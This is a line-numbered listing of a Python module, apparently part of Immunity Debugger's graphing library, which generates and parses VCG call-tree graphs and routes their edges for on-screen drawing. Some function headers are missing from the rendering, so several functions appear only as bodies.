+ 17 """ 18 NOTES: 19 need to divide graph in layers 20 save max layer in graph 21 every set of childs [unique and different part vertex] E a different layer 22 save vertex of layer in each layer 23 mark blank path points in each layer [i preffer path points to dummy vertices] 24 25 for layer in layers: 26 move east and west vertices, depending on their type * 27 28 pathfinder(graph) 29 search empy spots where edge lines might travel 30 31 32 a cool thing might be mark the whole graph as east-slanted or west-slanted, according the graph 33 the n east or n west it will move 34 35 if the graph is slanting too much to east from center point, we can start thinking on going west 36 that can be too fuzzy, but will try to make an aproach for human eye 37 38 39 new lib against old lib: 40 orphan vertices from old lib has been solved, now every vertex has at least 1 relationship saved 41 parent<->child type of vertex are correctly relationed now 42 43 """ 44
+ 45 import graphclass 46
+ 47 import immlib 48 import debugger 49
+ 50
+ 51
+ 52
+ 53 from random import randint 54
+ 55
+ 56 PALETTE = [ ] 57
+ 58 PALETTE . append ( "manhattan_edges: yes\r\n" ) 59 PALETTE . append ( "layoutalgorithm: mindepth\r\n" ) 60 PALETTE . append ( "finetuning: no\r\n" ) 61 PALETTE . append ( "layout_downfactor: 100\r\n" ) 62 PALETTE . append ( "layout_upfactor: 0\r\n" ) 63 PALETTE . append ( "layout_nearfactor: 0\r\n" ) 64 PALETTE . append ( "xlspace: 12\r\n" ) 65 PALETTE . append ( "yspace: 30\r\n" ) 66 PALETTE . append ( "colorentry 32: 0 0 0\r\n" ) 67 PALETTE . append ( "colorentry 33: 0 0 255\r\n" ) 68 PALETTE . append ( "colorentry 34: 0 0 255\r\n" ) 69 PALETTE . append ( "colorentry 35: 128 128 128\r\n" ) 70 PALETTE . append ( "colorentry 36: 128 128 128\r\n" ) 71 PALETTE . append ( "colorentry 37: 0 0 128\r\n" ) 72 PALETTE . append ( "colorentry 38: 0 0 128\r\n" ) 73 PALETTE . append ( "colorentry 39: 0 0 255\r\n" ) 74 PALETTE . append ( "colorentry 40: 0 0 255\r\n" ) 75 PALETTE . append ( "colorentry 41: 0 0 128\r\n" ) 76 PALETTE . append ( "colorentry 42: 0 128 0\r\n" ) 77 PALETTE . append ( "colorentry 43: 0 255 0\r\n" ) 78 PALETTE . append ( "colorentry 44: 0 128 0\r\n" ) 79 PALETTE . append ( "colorentry 45: 255 128 0\r\n" ) 80 PALETTE . append ( "colorentry 46: 0 128 0\r\n" ) 81 PALETTE . append ( "colorentry 47: 128 128 255\r\n" ) 82 PALETTE . append ( "colorentry 48: 255 0 0\r\n" ) 83 PALETTE . append ( "colorentry 49: 128 128 0\r\n" ) 84 PALETTE . append ( "colorentry 50: 1 1 1\r\n" ) 85 PALETTE . append ( "colorentry 51: 192 192 192\r\n" ) 86 PALETTE . append ( "colorentry 52: 0 0 255\r\n" ) 87 PALETTE . append ( "colorentry 53: 0 0 255\r\n" ) 88 PALETTE . append ( "colorentry 54: 0 0 255\r\n" ) 89 PALETTE . append ( "colorentry 55: 128 128 128\r\n" ) 90 PALETTE . append ( "colorentry 56: 128 128 255\r\n" ) 91 PALETTE . append ( "colorentry 57: 0 128 0\r\n" ) 92 PALETTE . append ( "colorentry 58: 0 0 128\r\n" ) 93 PALETTE . append ( "colorentry 59: 0 0 255\r\n" ) 94 PALETTE . append ( "colorentry 60: 128 0 128\r\n" ) 95 PALETTE . append ( "colorentry 61: 0 128 0\r\n" ) 96 PALETTE . append ( "colorentry 62: 0 128 0\r\n" ) 97 PALETTE . append ( "colorentry 63: 0 128 64\r\n" ) 98 PALETTE . append ( "colorentry 64: 0 0 128\r\n" ) 99 PALETTE . append ( "colorentry 65: 0 0 128\r\n" ) 100 PALETTE . append ( "colorentry 66: 255 0 255\r\n" ) 101 PALETTE . append ( "colorentry 67: 128 128 0\r\n" ) 102 PALETTE . append ( "colorentry 68: 0 0 128\r\n" ) 103 PALETTE . append ( "colorentry 69: 0 0 255\r\n" ) 104 PALETTE . append ( "colorentry 70: 0 0 128\r\n" ) 105 PALETTE . append ( "colorentry 71: 0 0 255\r\n" ) 106 PALETTE . append ( "colorentry 72: 0 0 0\r\n" ) 107 PALETTE . append ( "colorentry 73: 255 255 255\r\n" ) 108 PALETTE . append ( "colorentry 74: 192 192 192\r\n" ) 109 PALETTE . append ( "colorentry 75: 0 255 255\r\n" ) 110 PALETTE . append ( "colorentry 76: 0 0 0\r\n" ) 111 PALETTE . append ( "colorentry 77: 128 0 0\r\n" ) 112 PALETTE . append ( "colorentry 78: 128 128 128\r\n" ) 113 PALETTE . append ( "colorentry 79: 128 128 0\r\n" ) 114 PALETTE . append ( "colorentry 80: 255 0 255\r\n" ) 115 PALETTE . append ( "colorentry 81: 0 0 0\r\n" ) 116 PALETTE . append ( "colorentry 82: 0 0 255\r\n" ) 117 PALETTE . append ( "colorentry 83: 0 0 0\r\n" ) 118
+
120
+
122 """ Init the graphing object """
+
123 self . imm = imm
+
124 self . callTree = imm . getCallTree ( address )
+
125 self . address = address
+
126
+
128 """ return a call ordered list of nodes """
+
129
+
130
+
131
+
132
+
133
+
134
+
135
+
136
+
137
+
138 TARGET = [ ]
+
139 PARENTS = [ ]
+
140 CHILDREN = [ ]
+
141
+
142 for call in self . callTree :
+
143 if call [ 3 ] :
+
144 if "0x%X" % call [ 3 ] not in TARGET :
+
145 TARGET . append ( "0x%X" % call [ 3 ] )
+
146 if call [ 4 ] :
+
147 if "0x%X" % call [ 4 ] not in PARENTS :
+
148 PARENTS . append ( "0x%X" % call [ 4 ] )
+
149 if call [ 5 ] :
+
150 if "0x%X" % call [ 5 ] not in CHILDREN :
+
151 CHILDREN . append ( "0x%X" % call [ 5 ] )
+
152
+
153 return TARGET , PARENTS , CHILDREN
+
154
+
155 - def makeNode ( self , title , content = "" , vertical_order = 0 ) :
+
156 """ build a simple node VCG buf entry """
+
157 node = [ ]
+
158 node . append ( 'node: {\r\n' )
+
159 node . append ( 'title: "%s"\r\n' % title )
+
160 node . append ( 'vertical_order: %d\r\n' % vertical_order )
+
161 if content != "" :
+
162 node . append ( 'label: "\x0c69%s\x0c31\r\n%s"\r\n' % ( title , content ) )
+
163 else :
+
164 node . append ( 'label: "\x0c69%s\x0c31\r\n' % title )
+
165 node . append ( '}\r\n' )
+
166 return node
+
167
+
168 - def makeEdge ( self , source , target , label = "" , color = "green" ) :
+
169 """ work out the relations between the boxies """
+
170
+
171 edge = [ ]
+
172
+
173 edge . append ( 'edge: {\r\n' )
+
174 edge . append ( 'sourcename: "%s"\r\n' % source )
+
175 edge . append ( 'targetname: "%s"\r\n' % target )
+
176 if label != "" :
+
177 edge . append ( 'label: "%s"\r\n' % label )
+
178 edge . append ( 'color: %s\r\n' % color )
+
179 edge . append ( '}\r\n' )
+
180
+
181 return edge
+
182
+
183 - def makeVCG ( self , title , nodes = [ ] , edges = [ ] ) :
+
184 """ build a simple node tree VCG buffer """
+
185 vcg = [ ]
+
186
+
187 vcg . append ( 'graph: {\r\n' )
+
188
+
189 vcg . append ( 'title: "%s"\r\n' % title )
+
190
+
191
+
192 for line in PALETTE :
+
193 vcg . append ( line )
+
194
+
195
+
196 for node in nodes :
+
197 for line in node :
+
198 vcg . append ( line )
+
199
+
200
+
201 for edge in edges :
+
202 for line in edge :
+
203 vcg . append ( line )
+
204
+
205
+
206 vcg . append ( '}\r\n' )
+
207
+
208 return vcg
+
209
+
211 """ pop up a call tree graph for this address """
+
212 TARGET , PARENTS , CHILDREN = self . orderNodesFromTree ( )
+
213
+
214 nodes = [ ]
+
215 unique = [ ]
+
216
+
217 for title in TARGET + PARENTS + CHILDREN :
+
218 if title not in unique :
+
219 unique . append ( title )
+
220
+
221
+
222 for title in unique :
+
223
+
224 if title in PARENTS :
+
225 order = 0
+
226 if title in TARGET :
+
227 order = 1
+
228 if title in CHILDREN :
+
229 order = 2
+
230
+
231
+
232 node_content = self . imm . decodeAddress ( int ( title , 16 ) )
+
233 nodes . append ( self . makeNode ( title , content = node_content , vertical_order = order ) )
+
234
+
235 edges = [ ]
+
236
+
237 target = TARGET [ 0 ]
+
238
+
239 for parent in PARENTS :
+
240
+
241 edges . append ( self . makeEdge ( parent , target ) )
+
242 for child in CHILDREN :
+
243 edges . append ( self . makeEdge ( target , child ) )
+
244
+
245
+
246 vcg = self . makeVCG ( "Call Graph <-for-> %s [0x%X]" % ( self . imm . decodeAddress ( self . address ) , self . address ) , nodes , edges )
+
247
+
248
+
249 fd = open ( "CALLTREE.vcg" , "w" )
+
250 for line in vcg :
+
251 fd . write ( line )
+
252 fd . close ( )
+
253
+
254
+
255 generateGraphFromBuf ( vcg )
+
256
+
258 """ recursive VCG parser """
+
259
+
261 """ pre-process our shiznit """
+
262 self . sep = '!SEP!'
+
263 self . DEBUG = False
+
264
+
265
+
266
+
267
+
268
+
269 self . MODETOKENS = [ 'graph:' , 'node:' , 'edge:' ]
+
270
+
271 self . VARTOKENS = [ 'title:' , 'label:' , 'vertical_order:' , 'horizontal_order:' , 'manhattan_edges:' , 'layoutalgorithm:' ]
+
272 self . VARTOKENS += [ 'finetuning:' , 'layout_downfactor:' , 'layout_upfactor:' ]
+
273 self . VARTOKENS += [ 'layout_nearfactor:' , 'xlspace:' , 'yspace:' ]
+
274 self . VARTOKENS += [ 'sourcename:' , 'targetname:' , 'color:' ]
+
275
+
276
+
277 cleanVCG = [ ]
+
278
+
279 sMode = False
+
280
+
281 for line in vcgList :
+
282
+
283
+
284 if line [ : 2 ] == "//" :
+
285 continue
+
286
+
287 clean = [ ]
+
288 lineList = list ( line )
+
289
+
290 for c in lineList :
+
291 if c == '"' :
+
292
+
293 sMode = not sMode
+
294
+
295 if sMode == True :
+
296 clean . append ( c )
+
297 else :
+
298 if c in [ '\r' ] :
+
299 continue
+
300 if c in [ '\n' , ' ' ] :
+
301 clean . append ( self . sep )
+
302 else :
+
303 clean . append ( c )
+
304
+
305 line = '' . join ( clean )
+
306
+
307 if len ( line ) :
+
308 cleanVCG . append ( line )
+
309
+
310 self . vcgText = '' . join ( cleanVCG )
+
311
+
312 self . nodeList = [ ]
+
313 self . edgeList = [ ]
+
314 self . graphList = [ ]
+
315
+
316 self . lastMode = ""
+
317
+
318 - def error ( self , error ) :
+
319 """ raise an error exception """
+
320 raise error
+
321
+
322 - def reParse ( self , vcgItems , mode = "" ) :
+
323 """ used for recursive parse """
+
324
+
325
+
326 if self . DEBUG :
+
327 logger = immlib . Debugger ( )
+
328 logger . Log ( repr ( vcgItems ) )
+
329
+
330
+
331 if vcgItems :
+
332
+
333 if vcgItems [ 0 ] in self . MODETOKENS :
+
334 mode = vcgItems [ 0 ]
+
335 self . lastMode = mode
+
336 self . reParse ( vcgItems [ 1 : ] , mode = mode )
+
337
+
338 elif vcgItems [ 0 ] in self . VARTOKENS or 'colorentry' in vcgItems [ 0 ] :
+
339
+
340
+
341 if 'colorentry' in vcgItems [ 0 ] :
+
342 vcgItems [ 0 ] = " " . join ( [ vcgItems [ 0 ] , vcgItems [ 1 ] ] )
+
343 del vcgItems [ 1 ]
+
344
+
345 args = [ ]
+
346 key = vcgItems [ 0 ]
+
347
+
348 i = 1
+
349 while vcgItems [ i ] not in self . VARTOKENS and vcgItems [ i ] not in self . MODETOKENS and 'colorentry' not in vcgItems [ i ] :
+
350 if '}' in vcgItems [ i ] :
+
351 break
+
352 args . append ( vcgItems [ i ] )
+
353 i += 1
+
354
+
355 if mode == 'node:' and len ( self . nodeList ) :
+
356 self . nodeList [ len ( self . nodeList ) - 1 ] [ key ] = " " . join ( args )
+
357
+
358 if mode == 'edge:' and len ( self . edgeList ) :
+
359 self . edgeList [ len ( self . edgeList ) - 1 ] [ key ] = " " . join ( args )
+
360
+
361 if mode == 'graph:' and len ( self . graphList ) :
+
362 self . graphList [ len ( self . graphList ) - 1 ] [ key ] = " " . join ( args )
+
363
+
364 self . reParse ( vcgItems [ i : ] , mode = self . lastMode )
+
365
+
366 elif '{' in vcgItems [ 0 ] :
+
367
+
368
+
369 if mode == 'graph:' :
+
370 self . graphList . append ( { } )
+
371 elif mode == 'node:' :
+
372 self . nodeList . append ( { } )
+
373 elif mode == 'edge:' :
+
374 self . edgeList . append ( { } )
+
375
+
376 self . reParse ( vcgItems [ 1 : ] , mode = mode )
+
377
+
378
+
379 elif '}' in vcgItems [ 0 ] :
+
380 self . reParse ( vcgItems [ 1 : ] , mode = '' )
+
381
+
382
+
383 return self . graphList , self . nodeList , self . edgeList
+
384
+
386 """ Parse a VCG graph .. not 100% proper .. but proper enough """
+
387 vcgItems = self . vcgText . split ( self . sep )
+
388 return self . reParse ( vcgItems )
+
389
+
391 """ test our new VCG parsing logic """
+
392 vcgList = [ ]
+
393
+
394 fd = open ( path , 'r' )
+
395 for line in fd :
+
396 vcgList . append ( line )
+
397 fd . close ( )
+
398
+
399 parser = ParseVCGList ( vcgList )
+
400
+
401
+
402 graph , nodes , edges = parser . parseGraph ( )
+
403
+
404 logger = immlib . Debugger ( )
+
405
+
406 logger . Log ( "GRAPH:" )
+
407 for gDict in graph :
+
408 for key in gDict :
+
409 logger . Log ( "KeyVal: %s" % key )
+
410 logger . Log ( repr ( gDict [ key ] ) )
+
411 logger . Log ( "EDGES:" )
+
412 for eDict in edges :
+
413 for key in eDict :
+
414 logger . Log ( "KeyVal: %s" % key )
+
415 logger . Log ( repr ( eDict [ key ] ) )
+
416 logger . Log ( "NODES:" )
+
417 for nDict in nodes :
+
418 for key in nDict :
+
419 logger . Log ( "KeyVal: %s" % key )
+
420 logger . Log ( repr ( nDict [ key ] ) )
+
421
+
422 return
+
423
+ 424
+
426
+
427
+
428
+
429
+
430 parser = ParseVCGList ( buf )
+
431
+
432 GRAPH , NODES , EDGES = parser . parseGraph ( )
+
433
+
434
+
435 title = GRAPH [ 0 ] [ 'title:' ]
+
436
+
437
+
438 try :
+
439
+
440 start_address = title . split ( "(" ) [ 1 ] [ : 8 ]
+
441 except :
+
442 start_address = "0xcafebabe"
+
443
+
444
+
445 Draw = graphclass . Draw ( )
+
446
+
447 DrawHandler = Draw . createGraphWindow ( title , start_address )
+
448 G = graphclass . Graph ( )
+
449
+
450 G . setHandler ( DrawHandler )
+
451
+
452
+
453 vertices = createVertexList ( NODES , DrawHandler )
+
454
+
455
+
456 for vertex in vertices :
+
457 vertex . calculateAbsoluteSize ( vertex . getVertexBuffer ( ) )
+
458
+
459 G . addVertices ( vertices )
+
460
+
461 createAdjacencyList ( G , vertices , EDGES )
+
462
+
463 """
+
464 at this point we have:
+
465 * draw instance [graph window inside debugger]
+
466 * graph instance
+
467 * vertex instances list
+
468 * edges lists + properties [true, false, direct]
+
469 * vertex instances list
+
470 * buffers
+
471 * absolute sizes
+
472 * adj lists of in and out edges
+
473 we now need to iterate our lists and define the best way to place
+
474 vertices
+
475 """
+
476
+
477
+
478 firstAttemptToPlace ( vertices )
+
479
+
480 finalAttemptToPlace ( vertices )
+
481
+
482 adjustStartCoords ( vertices , G )
+
483
+
484 G . setBitSize ( vertices )
+
485
+
486 edgelist = pathFinder ( vertices )
+
487
+
488 drawEdges ( edgelist , DrawHandler )
+
489
+
490 drawVertices ( vertices )
+
491
+
492
+
493
+
494 G . splashTime ( )
+
495
+ 496
+
498 """ generates a VCG given a function address """
+
499 try :
+
500 vcg = generateVCG ( address )
+
501 except :
+
502 print "[XXX] Error generating VCG"
+
503 return
+
504
+
505
+
506 generateGraphFromBuf ( vcg )
+
507
+ 508
+
516
+ 517
+ 518
+
520 """ iterate vcg file to get vertex list and vertices's buffers"""
+
521 vertices = [ ]
+
522
+
523 for node in nodes :
+
524 vertexbuf = [ ]
+
525 v = graphclass . Vertex ( handler )
+
526
+
527 logger = immlib . Debugger ( )
+
528
+
529 label = node [ 'label:' ]
+
530 content = label [ label . find ( "\x0c31" ) + 3 : ]
+
531 content = content . replace ( '"' , '' )
+
532 label = label [ label . find ( "\x0c69" ) + 3 : label . find ( "\x0c31" ) ]
+
533
+
534 v . setLabel ( label )
+
535
+
536 title = node [ 'title:' ]
+
537 v . setName ( title )
+
538 vertices . append ( v )
+
539
+
540 vertexbuf += [ v . getLabel ( ) ]
+
541 for key in node :
+
542 if key not in [ 'vertical_order:' , 'title:' , 'label:' ] :
+
543 nodeLine = node [ key ]
+
544 vertexbuf += [ ' ' . join ( [ key , node [ key ] ] ) ]
+
545
+
546
+
547 content = content . split ( '\r\n' )
+
548 for line in content :
+
549
+
550 if len ( line ) :
+
551 vertexbuf += [ line ]
+
552
+
553 v . setVertexBuffer ( vertexbuf )
+
554
+
555 return vertices
+
556
+ 557
+ 558
+ 559
+ 560
+ 561
+ 562
+ 563
+ 564
+ 565
+ 566
+ 567
+ 568
+ 569
+ 570
+ 571
+ 572
+ 573
+ 574
+ 575
+ 576
+ 577
+ 578
+
580
+
581
+
582
+
583
+
584
+
585
+
586 for a in range ( 1 , 15 ) :
+
587 for vertex in vertices :
+
588 checkForPlacedVertex ( vertex , vertices )
+
589
+
591 templist = edgelist
+
592 vertexlist = [ ]
+
593 ( xl , yl , x2l , y2l , color ) = edgelist [ - 1 ]
+
594 for vertex in vertices :
+
595 ( x , y , x2 , y2 ) = vertex . getCoords ( )
+
596
+
597
+
598 if xl >= x - 5 and xl <= x2 + 5 and yl < y and y2l > y :
+
599 vertexlist . append ( vertex )
+
600
+
601 return applyDummyPathsH2South ( vertexlist , edgelist )
+
602
+
604 templist = edgelist
+
605 vertexlist = [ ]
+
606 ( xl , yl , x2l , y2l , color ) = edgelist [ - 1 ]
+
607 for vertex in vertices :
+
608 ( x , y , x2 , y2 ) = vertex . getCoords ( )
+
609 if xl >= x - 5 and xl <= x2 + 5 and yl > y and y2l < y :
+
610 vertexlist . append ( vertex )
+
611
+
612 return applyDummyPathsH2North ( vertexlist , edgelist )
+
613
+ 614 """ 615 NOTES: 616 617 if i use an edge templist i might be able to grep off 618 the non usefull bendings: 619 620 --| 621 __| 622 623 => 624 625 | 626 | 627 628 another nice thing would be to check wheter im nearest to east or west of 629 the overlapped vertex, so i can decide where to escape 630 """ 631
+ 632
+
634 ( xl , yl , x2l , y2l , color ) = edgelist [ - 1 ]
+
635 vertexlist . sort ( )
+
636 for vertex in vertexlist :
+
637 ( x , y , x2 , y2 ) = vertex . getCoords ( )
+
638 cm = randint ( - 20 , - 10 )
+
639
+
640 if y2l - 5 > y and y2l <= y2 and len ( vertexlist ) == 1 :
+
641 ( tx , ty , tx2 , ty2 , color ) = edgelist [ - 1 ]
+
642 edgelist [ - 1 ] = ( ( tx , ty , tx2 , y - 10 , color ) )
+
643 else :
+
644 if vertexlist . index ( vertex ) == 0 :
+
645 edgelist [ - 1 ] = ( ( xl , yl , xl , y - 10 , color ) )
+
646 else :
+
647 pass
+
648
+
649
+
650 edgelist . append ( ( xl , y - 10 , x - 10 + cm , y - 10 , color ) )
+
651 edgelist . append ( ( x - 10 + cm , y - 10 , x - 10 + cm , y2 + 10 , color ) )
+
652 if vertex != vertexlist [ - 1 ] :
+
653 edgelist . append ( ( x - 10 + cm , y2 + 10 , xl , y2 + 10 , color ) )
+
654 endx = xl
+
655 endy = y2 + 10
+
656
+
657
+
658 return edgelist
+
659
+
661 ( xl , yl , x2l , y2l , color ) = edgelist [ - 1 ]
+
662 vertexlist . sort ( )
+
663 for vertex in vertexlist :
+
664 ( x , y , x2 , y2 ) = vertex . getCoords ( )
+
665 if y2l > y and y2l <= y2 and len ( vertexlist ) == 1 :
+
666 ( tx , ty , tx2 , ty2 , color ) = edgelist [ - 1 ]
+
667 edgelist [ - 1 ] = ( ( tx , ty , tx2 , y - 10 , color ) )
+
668 else :
+
669 if vertexlist . index ( vertex ) == 0 :
+
670 edgelist [ - 1 ] = ( ( xl , yl , xl , y - 10 , color ) )
+
671 else :
+
672 pass
+
673 edgelist . append ( ( endx , endy , endx , y - 10 , color ) )
+
674
+
675 if x2 - xl < xl - x :
+
676 cm = randint ( - 5 , 5 )
+
677 edgelist . append ( ( xl , y - 10 , x2 + 20 + cm , y - 10 , color ) )
+
678 edgelist . append ( ( x2 + 20 + cm , y - 10 , x2 + 20 + cm , y2 + 10 , color ) )
+
679 if vertex != vertexlist [ - 1 ] :
+
680 edgelist . append ( ( x2 + 20 + cm , y2 + 10 , xl , y2 + 10 , color ) )
+
681 endx = xl
+
682 endy = y2 + 10
+
683 else :
+
684 cm = randint ( - 20 , - 10 )
+
685 edgelist . append ( ( xl , y - 10 , x - 10 + cm , y - 10 , color ) )
+
686 edgelist . append ( ( x - 10 + cm , y - 10 , x - 10 + cm , y2 + 10 , color ) )
+
687 if vertex != vertexlist [ - 1 ] :
+
688 edgelist . append ( ( x - 10 + cm , y2 + 10 , xl , y2 + 10 , color ) )
+
689 endx = xl
+
690 endy = y2 + 10
+
691
+
692
+
693
+
694 return edgelist
+
695
+ 696
+
698 ( xl , yl , x2l , y2l , color ) = edgelist [ - 1 ]
+
699 vertexlist . sort ( )
+
700 vertexlist . reverse ( )
+
701 for vertex in vertexlist :
+
702 ( x , y , x2 , y2 ) = vertex . getCoords ( )
+
703 if y2l > y and y2l <= y2 and len ( vertexlist ) == 1 :
+
704 pass
+
705
+
706
+
707 else :
+
708 if vertexlist . index ( vertex ) == 0 :
+
709 edgelist [ - 1 ] = ( ( xl , yl , xl , y2 + 10 , "Blue" ) )
+
710 else :
+
711 pass
+
712 edgelist . append ( ( endx , endy , endx , y - 10 , "Aqua" ) )
+
713
+
714
+
715 cm = randint ( - 5 , 5 )
+
716 edgelist . append ( ( xl , y2 + 10 , x2 + 20 + cm , y2 + 10 , "red" ) )
+
717 edgelist . append ( ( x2 + 20 + cm , y2 + 10 , x2 + 20 + cm , y - 10 , "Yellow" ) )
+
718 if vertex != vertexlist [ - 1 ] :
+
719 edgelist . append ( ( x2 + 20 + cm , y2 + 10 , xl , y2 + 10 , "Maroon" ) )
+
720 endx = xl
+
721 endy = y - 10
+
722
+
723
+
724
+
725
+
726
+
727
+
728
+
729
+
730
+
731
+
732
+
733
+
734
+
735
+
736 return edgelist
+
737
+
739 ( xl , yl , x2l , y2l , color ) = edgelist [ - 1 ]
+
740 vertexlist . sort ( )
+
741 vertexlist . reverse ( )
+
742 for vertex in vertexlist :
+
743 ( x , y , x2 , y2 ) = vertex . getCoords ( )
+
744 if y2l > y and y2l <= y2 and len ( vertexlist ) == 1 :
+
745 ( tx , ty , tx2 , ty2 , color ) = edgelist [ - 1 ]
+
746 edgelist [ - 1 ] = ( ( tx , ty , tx2 , y - 10 , color ) )
+
747 if vertexlist . index ( vertex ) == 0 :
+
748 edgelist [ - 1 ] = ( ( xl , yl , xl , y2 + 10 , color ) )
+
749 else :
+
750 edgelist . append ( ( endx , endy , endx , y2 + 10 , color ) )
+
751
+
752 cm = randint ( - 5 , 5 )
+
753 if x2 - xl < xl - x :
+
754 edgelist . append ( ( xl , y2 + 10 , x2 + 20 + cm , y2 + 10 , color ) )
+
755 edgelist . append ( ( x2 + 20 + cm , y2 + 10 , x2 + 20 + cm , y - 10 , color ) )
+
756 if vertex != vertexlist [ - 1 ] :
+
757 edgelist . append ( ( x2 + 20 + cm , y - 10 , xl , y - 10 , color ) )
+
758 endx = xl
+
759 endy = y - 10
+
760 else :
+
761 edgelist . append ( ( xl , y2 + 10 , x - 20 + cm , y2 + 10 , color ) )
+
762 edgelist . append ( ( x - 20 + cm , y2 + 10 , x - 20 + cm , y - 10 , color ) )
+
763 if vertex != vertexlist [ - 1 ] :
+
764 edgelist . append ( ( x - 20 + cm , y - 10 , xl , y - 10 , color ) )
+
765 endx = xl
+
766 endy = y - 10
+
767
+
768 return edgelist
+
769
+ 770
+
772 return
+
773 ( xl , yl , x2l , y2l , a ) = edgelist [ - 1 ]
+
774 for vertex in vertices :
+
775 ( x , y , x2 , y2 ) = vertex . getCoords ( )
+
776 if xl > x or yl < x2 and x2l > y2 :
+
777 pass
+
778 else :
+
779 f = open ( "ea.txt" , "w+" )
+
780 f . write ( "quilombo %s\n" % str ( x ) )
+
781 f . close ( )
+
782 return edgelist
+
783
+
785 """find edge's path
+
786 To find an endge path we start joining two vertex with 3 basic strokes,
+
787 A -> B -> C
+
788 after placing each of this basci strokes we check if it is not overlapping a vertex, if so
+
789 we decide a alternate path based on dummy blank points
+
790 A -> A' -> A'' -> B -> C
+
791 where A' (x2,y2) is the original A (x2,y2) so the next basic stroke B, knows how
+
792 to keep going
+
793
+
794 """
+
795 """note on adding edges to edgelist:
+
796 since edgelist will self modify with other functions if pretty important
+
797 to add relative values and not absolute values.
+
798 ie: before adding a new edge check the last one, and the new values must be relative to edgelist[-1]
+
799 """
+
800 edgelist = [ ]
+
801 f = open ( "edges.txt" , "w" )
+
802 for vertex in vertices :
+
803 ( x , y , x2 , y2 ) = vertex . getCoords ( )
+
804 parentw = vertex . getWidth ( )
+
805 parenth = vertex . getHeight ( )
+
806 outadj = vertex . getOutAdj ( )
+
807 for child in outadj :
+
808 if child [ 1 ] == 1 :
+
809 for vertexchild in vertices :
+
810 if child [ 0 ] == vertexchild . getName ( ) :
+
811 if vertex . getName ( ) == vertexchild . getName ( ) :
+
812
+
813 edgelist . append ( ( parentw * 1 / 4 + x + chaosmov , parenth + y - 1 , parentw * 1 / 4 + x + chaosmov , parenth + y + 5 , "darkgreen" ) )
+
814 edgelist . append ( ( parentw * 1 / 4 + x + chaosmov , parenth + y + 5 , x - 14 , parenth + y + 5 , "darkgreen" ) )
+
815 edgelist . append ( ( x - 14 , parenth + y + 5 , x - 14 , y - 10 , "darkgreen" ) )
+
816 edgelist . append ( ( x - 14 , y - 10 , parentw * 1 / 4 + x + chaosmov , y - 10 , "darkgreen" ) )
+
817 edgelist . append ( ( parentw * 1 / 4 + x + chaosmov , y - 10 , parentw * 1 / 4 + x + chaosmov , y - 1 , "darkgreen" ) )
+
818 else :
+
819 ( xch , ych , x2ch , y2ch ) = vertexchild . getCoords ( )
+
820 childw = vertexchild . getWidth ( )
+
821
+
822
+
823
+
824
+
825
+
826 f . write ( "Edge true from %s (%d,%d,%d,%d) to %s (%d,%d,%d,%d)\n" % ( vertex . getName ( ) , x , y , x2 , y2 , vertexchild . getName ( ) , xch , ych , x2ch , y2ch ) )
+
827 chaosmov = randint ( - 5 , 0 )
+
828 if ( parenth + y - 1 ) > ych - 2 - 25 :
+
829 edgelist . append ( ( parentw * 1 / 4 + x + chaosmov , parenth + y - 1 , parentw * 1 / 4 + x + chaosmov , parenth + y + 5 , "Blue" ) )
+
830 edgelist . append ( ( parentw * 1 / 4 + x + chaosmov , parenth + y + 5 , x - 14 , parenth + y + 5 , "Blue" ) )
+
831 edgelist . append ( ( x - 14 , parenth + y + 5 , x - 14 , ych - 2 - 20 + chaosmov , "Blue" ) )
+
832 edgelist = searchForDummyPathsH2North ( edgelist , vertices )
+
833 ( tx , ty , tx2 , ty2 , color ) = edgelist [ - 1 ]
+
834 edgelist . append ( ( tx2 , ty2 , xch + ( childw * 1 / 2 ) + chaosmov , ty2 , color ) )
+
835 ( tx , ty , tx2 , ty2 , color ) = edgelist [ - 1 ]
+
836 if ty2 < y2ch :
+
837 edgelist . append ( ( tx2 , ty2 , tx2 , ych - 2 , color ) )
+
838 else :
+
839 edgelist . append ( ( tx2 , ty2 , tx2 , y2ch - 2 , color ) )
+
840
+
841 else :
+
842
+
843 edgelist . append ( ( parentw * 1 / 4 + x + chaosmov , parenth + y - 1 , parentw * 1 / 4 + x + chaosmov , ych - 2 - 25 + chaosmov , "darkgreen" ) )
+
844 edgelist = searchForDummyPathsH2South ( edgelist , vertices )
+
845
+
846 ( tx , ty , tx2 , ty2 , color ) = edgelist [ - 1 ]
+
847 edgelist . append ( ( tx , ty2 , xch + ( childw * 1 / 2 ) + chaosmov , ty2 , color ) )
+
848 ( tx , ty , tx2 , ty2 , color ) = edgelist [ - 1 ]
+
849 if ty2 < y2ch :
+
850 edgelist . append ( ( tx2 , ty2 , tx2 , ych - 2 , color ) )
+
851 else :
+
852 edgelist . append ( ( tx2 , ty2 , tx2 , y2ch - 2 , color ) )
+
853 edgelist . append ( ( tx2 , ty2 , tx2 , ych - 2 , color ) )
+
854
+
855
+
856 addEndPointToEdge ( edgelist )
+
857
+
858
+
859 elif child [ 1 ] == 2 :
+
860 for vertexchild in vertices :
+
861 if child [ 0 ] == vertexchild . getName ( ) :
+
862 if vertex . getName ( ) == vertexchild . getName ( ) :
+
863
+
864 debugger . Error ( "loop false" )
+
865 edgelist . append ( ( parentw * 1 / 4 + x + chaosmov , parenth + y - 1 , parentw * 1 / 4 + x + chaosmov , parenth + y + 5 , "red" ) )
+
866 edgelist . append ( ( parentw * 1 / 4 + x + chaosmov , parenth + y + 5 , x - 14 , parenth + y + 5 , "red" ) )
+
867 edgelist . append ( ( x - 14 , parenth + y + 5 , x - 14 , y - 10 , "red" ) )
+
868 edgelist . append ( ( x - 14 , y - 10 , parentw * 1 / 4 + x + chaosmov , y - 10 , "red" ) )
+
869 edgelist . append ( ( parentw * 1 / 4 + x + chaosmov , y - 10 , parentw * 1 / 4 + x + chaosmov , y - 1 , "red" ) )
+
870
+
871 else :
+
872 ( xch , ych , x2ch , y2ch ) = vertexchild . getCoords ( )
+
873 childw = vertexchild . getWidth ( )
+
874 chaosmov = randint ( 0 , 5 )
+
875 if ( parenth + y - 1 ) > ych - 2 - 25 :
+
876 edgelist . append ( ( parentw * 3 / 4 + x + chaosmov , parenth + y - 1 , parentw * 3 / 4 + x + chaosmov , parenth + y + 5 , "Blue" ) )
+
877 edgelist . append ( ( parentw * 3 / 4 + x + chaosmov , parenth + y + 5 , x2 + 14 , parenth + y + 5 , "Blue" ) )
+
878 edgelist . append ( ( x2 + 14 , parenth + y + 5 , x2 + 14 , ych - 2 - 20 + chaosmov , "Blue" ) )
+
879 edgelist = searchForDummyPathsH2North ( edgelist , vertices )
+
880 ( tx , ty , tx2 , ty2 , color ) = edgelist [ - 1 ]
+
